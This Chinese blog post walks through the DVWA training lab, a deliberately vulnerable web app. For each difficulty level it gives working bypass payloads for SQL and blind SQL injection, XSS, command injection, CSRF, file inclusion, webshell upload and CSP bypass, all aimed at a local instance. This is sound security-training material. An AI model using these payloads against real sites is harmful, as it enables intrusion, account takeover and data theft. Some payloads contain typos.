靶场搭建
DVWA靶场的下载地址 https://github.com/digininja/DvWA/archive/master.zip
这里是用小皮在windows下搭建的,也比较简单
下载完解压到小皮的www目录下
进入DVWA-master\config将config.inc.php.dist文件后缀名删除,
并打开配置如图
浏览器就可以访问了http://127.0.0.1/DVWA-master/
首次进入下滑最下面创建数据库,就进入了
Brute Force(暴力破解)
low level
输入字符没有任何过滤,直接用bp来爆破
随便输入采用Cluster bomb 进行爆破
获取到账号密码
medium level
分析源码加入了mysqli_real_escape_string()函数,防止了部分SQL注入
还是爆破
和low一样
high level
分析源码
加入了Anti-CSRF token验证,还是可以进行暴力破解的,不过要知道用户名这里是(admin)
发送intruder 选择 Pitchfork
Command Injection(命令注入)
low level
command1 && command2 先执行command1,如果为真,再执行command2
command1 & command2 command1 与command2同时执行,不管command1 是否执行成功
command1 || command2 先执行command1 ,如果为假,再执行command2
command1 | command2 只执行command2
command1 ;command2 先执行1,后执行2(linux)
等级为low没有什么过滤
Medium level
过滤了&& 不过可以使用 ||
high level
过滤了| 、&&、&
但没有过滤||
CSRF
low level
查看源码,发现只验证了 新密码和确认密码是否一致
随便输入新密码和确认密码 发现url中存在泄露
通过站长之家构造短链接,显得给更真实
访问成功,成功进行修改
medium level
审计源代码stripos()函数查找字符串再另一个字符串中第一次出现的位置(不区分大小写)
检查了保留变量HTTP_REFERTER(http包头部的referter字段的值,表示来源地址)是否包含SERVER-NAME(http包头部Host字段表示要访问的主机)
构造恶意页面文件名改为127.0.0.1.html ,HTTP_REFERTER就会包含127.0.0.1.html,就可以绕过stripos
high level
查看源代码发现增加了token验证
在burp安装插件,添加主机名name token值,再重新抓包进行重放
可以任意修改密码
File Inclusion(文件包含)
low level
进入访问1.php 查看 ,发现5.php 存在include函数
可以利用文件上传一句话木马,复制路径通过文件包含看是否解析
复制路径,../../hackable/uploads/include.php
使用蚁剑进行连接
Medium level
查看源码
使用str_replace对http:// ,https://替换成空,可以使用双写进行远程命令执行
还过滤了../、..\可以使用绝对路径的方式进行绕过
high level
fnmatch()函数根据指定的模式来匹配文件名或字符串,可以看到,High级别的代码对包含的文件名进行了限制,必须为file*或者include.php ,否则会error
File Upload
low level
没有对上传的文件做任何限制,直接上传一句话木马,蚁剑进行连接
medium level
查看源码验证了文件类型,和文件大小
上传成功 蚁剑连接
high level
看到一个getimagesize(string filename)函数 他会通过读取文件头,返回图片的长,宽等信息,如果图片没有文件头,函数就会报错,读取文件名中最后一个'.'后的字符串,必须是.jpg/.jpeg/.png 之一
上传一个图片马,通过文件包含进行解析,或者通过命令执行进行修改后缀名
通过命令执行重命名了
Inssecure CAPTCHA(不安全的验证码)
low level
查看源码发现只验证了change,step参数来判断用户是否输入了正确的验证码,抓包进行绕过
将step值修改为2,即可
medium level
查看源码发现这次验证了5个参数,抓包进行修改
增加了 passed_captcha=true
high level
查看源代码发现验证 g-recaptcha-response
User-Agent
漏洞利用
按照限制,抓取修改密码数据包 User-Agent: reCAPTCHA
g-recaptcha-response=hidd3n_valu3
SQL Injection
low level
通过输入1 可查询到admin 1' 失败
可以判断出ID是被''包括起来,输入字符型注入
判断字段数,有两个字段
判断回显位,判断数据库名称
接着判断表名,列明,字段值
-1' union select 1, group_concat(table_name) from information_schema.tables where table_schema='dvwa' #
medium level
使用了mysql_real_wescape_string函数对特殊符号\x00,\n,\r,,',",\x1a进行转义,同时前端页面设置了下拉选择表单,
1 and 1=1# 查询成功,
1 and 1=2 union select 1, concat((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273), floor(rand(0)*2))x from information_schema.tables group by x#
high level
可以看到。添加了LIMIT1 ,希望以此控制只输出一个结果,提交页面和查询结果不是同一个,也没有302跳转,这样做的目的是为了防止一般的sqlmap注入
SQL Injection(Blind)
low level
有两种回显 存在: User ID exists in the database; 不存在: User ID is MISSING from the database;
存在字符型盲注
猜解数据库长度
1' and length(database())>10 #
1' and length(database())=4 #
数据库的第一个字符,利用substr()函数 从给定字符串中,从指定位置开始截取指定长度的字符串,分离出数据库名称的位置,并分别转换位ASCLL,与对应的ascii值比较
substr(string,start,length);
第一个字符为1' and ascii(substr(database(),1,1))=100 #
第二个字符为1' and ascii(substr(database(),2,1))=118#
猜解数据库中的表名,先猜解表的个数,表的名字长度,表的每一个字符
1' and (select count (table_name) from information_schema.tables where table_schema=database()) =2 #
表名称的长度,
1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9 #
第一个表的第一个字符
1’ and ascii (substr((select table_name from iniformation_schema.tables where table_schema=database() limit 0,1),1,1))=103#
猜解表中的字段名
表中的字段数目,长度,字段的字符组成
猜解users表的字段数目:
长度
1' and (select count (column_name) from information_schema.columns where table_schema=database() and table_name='users')=8#
数据库中的字段名称
1' and (select count(*) from information_schema.columns where table_schema=database() and table_name='users' and column_name='user')=1 #
1' and (select count(*) from information_schema.columns where table_schema=database() and table_name='users' and column_name='password')=1 #
dvwa.users表的user的第一条记录长5个字符
1' and length(substr((select password from users limit 0,1),1))=32 #
medium level
post提交方式
延时注入
判断数据库长度
1 and if (length (database())=4,sleep(5),1)#
判断数据库的第一个字符
1 and if(ascii(substr(database(),1,1))=100,sleep(5),1) #
high level
Weak Session IDs
low level
简介 当用户登录后,在服务器就会创建一个会话(session),叫做会话控制,接着访问页面的时候就不用登录,只需要携带Session去访问。
每次点击都会dvwaSession 都会增加1
通过这个可以构造
payload:dvwaSession=4; security=low; PHPSESSID=p4g2t2r17un6elgirj3pbdfnf4
XSS (DOM)
low level
直接在default插入弹窗语句
medium level
查看源码,发现过滤了"<script" 构造payload
</option></select><img src=x onerror=alert(1)>
high level
查看源代码,发现只对default进行检查
设置payload &<script>alert(1)</script>
XSS(Reflected)反射性
low level
可以直接输入弹窗语句<script>alert('a')</script>
成功
medium level
查看源码,发现<script>被过滤了为空,可以使用大小写进行绕过
<ScRipt>alert('xss')</ScRipt>
high level
high级别的代码使用了正则表达式直接把<*s*c*r*i*p*t>给过滤了,*代表一个或任意字符,i代表不区分大小写,所以<script>标签在这里就不能用
不过可以使用img,svg body等标签的事件或者iframe等标签注入恶意js代码
<img src=1 οnerrοr=alert('xss')>
XSS(Stored)
low level
查看源代码
trim(string,charlist)
函数移除字符串两侧的空白字符或其他预定义字符,预定义字符包括、\t \n
\x0B \r 以及空格,可选参数charlist支持添加额外需要删除的字符
mysql_real_escape_string(string,connection)
函数会对字符串中的特殊符号 (\x00 ,\n \r \,' ," ,\x1a)进行转义
stripslashes(string)函数删除字符串中的反斜杠。
可以看到,对输入并没有坐XSS方面的过滤与检查,且存储在数据库中
进行测试
medium level
strip_tags()
函数剥去字符串中的HTML 、XML 以及PHP的标签,但允许使用标签
addslases()
函数返回在预定义字符(单引号、双引号、反斜杠、NULL)之前添加发斜杠的字符串。
可以看到,由于对message参数使用了htmlspecialchars函数进行编码,因此无法在通过message参数注入xss代码,但是对于name参数,只是简单的过滤
修改长度,大小写绕过
high level
查看源码 message变量依然无法注入,name变量正则过滤更加完善,不区分大小写,且使用通配符匹配,导致嵌套构造的方法也不行,
<img src=1 onerror=alert(1) />CSP Bypass
low level
您可以包含来自外部源的脚本,检测内容安全策略,然后再此处输入要包含的URL:
查看源代码
首先,通过设置$headerCSP变量来定义CSP的策略规则
script-src指令被用来限制可执行的脚本的来源。通过设置'self'、https://pastebin.com、hastebin.con、www.toptal.com、 example.com 、code.jquery.com 和https://ssl.google-analytics.com这些来源。来允许从这些地址加载JavaScript。
然后,使用header()函数将定义好的CSP头部发送给浏览器,以告知浏览器采用CSP策略
接着是一个简单的网页表单,允许用户输入一个URL ,并在提交表单时使用$_POST['include']获取用户输入的URL.如果用户输入了URL ,那么会根据用户输入的URL动态生成一个<script>标签来加载外部脚本。
https://pastebin.com
medium level
首先,代码通过设置$headerCSP变量定义了一个内容安全策略头部。通过"script-src" 'self' 'unsafe-inline' 'nonce-TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=' 指令设置nonce ,其目的是为了提供额外的安全性,确保只有具有相应nonce的脚本能够被执行。这样可以防止未经授权的脚本注入攻击。然后使用header($headerCSP);将该内容安全策略头部应用于响应头。
接下来,通过header("X-XSS-Protection:0");这行代码,禁用了浏览器的跨站脚本攻击(xss)防护机制,以便内联的弹窗警告框能够正常工作
接下来的代码段是一个表单,允许用户输入内容,并将该内容直接输出到页面中。用户可以在文本框中输入任意内容,这些内容将被添加到页面的主体部分
构造poc
<script nonce="TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=">alert("xss")</script>
high level
由于 include 为可控参数且回调函数的名称solveSum可更改
故构造POC如下:
include=<script src="source/jsonp.php?callback=alert("qiushuo");"></script>
JavaScript
low level
输入success 提示token错误
查看源码
最下面的才是关键我们提交的phrase先调用rot13函数,再调用MD5函数,得到的值就是token,这两个函数就是加密方式。调用的函数就是generate_token(),我们只需要将关键字改为success再调用一遍这个函数就可以。
medium level
直接查看源码
源码中直接调用了一个medium.js文件,这个文件就是加密文件,里面的内容就是第二部分的代码
token是由do_elsesomething("XX")产生,上下都在定义函数,只有中间的两行再调用函数,
Open HTTP Redirect
low level
点击quote1 发现下面的url
查看源码得
可构造Payload如下:
?redirect=跳转网页url
例如: ?redirect=https://www.baidu.com
127.0.0.1/DVWA-master/vulnerabilities/open_redirect/source/low.php?redirect=https://www.baidu.com
发现可以跳转道百度页面
medium level
刚开始页面是一样的
查看源码看看
发现对http和https进行了判定
不过可以使用其他方法实现重定向:这里使用javaScript进行重定向或者使用服务器端重定向
代码如下:
<script type="text/javascript">
var redirectURL = "https://www.baidu.com";
windows.location.href = redirectURL; //执行重定向
</script>还可以使用代理页面: 创建一个中间代理页面,用户访问该页面时,该页面再将请求重定向到百度
创建一个php的文件
例如
<?php
header("Location: http://www.baidu.com");
exit;
?>
扫一扫
872
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
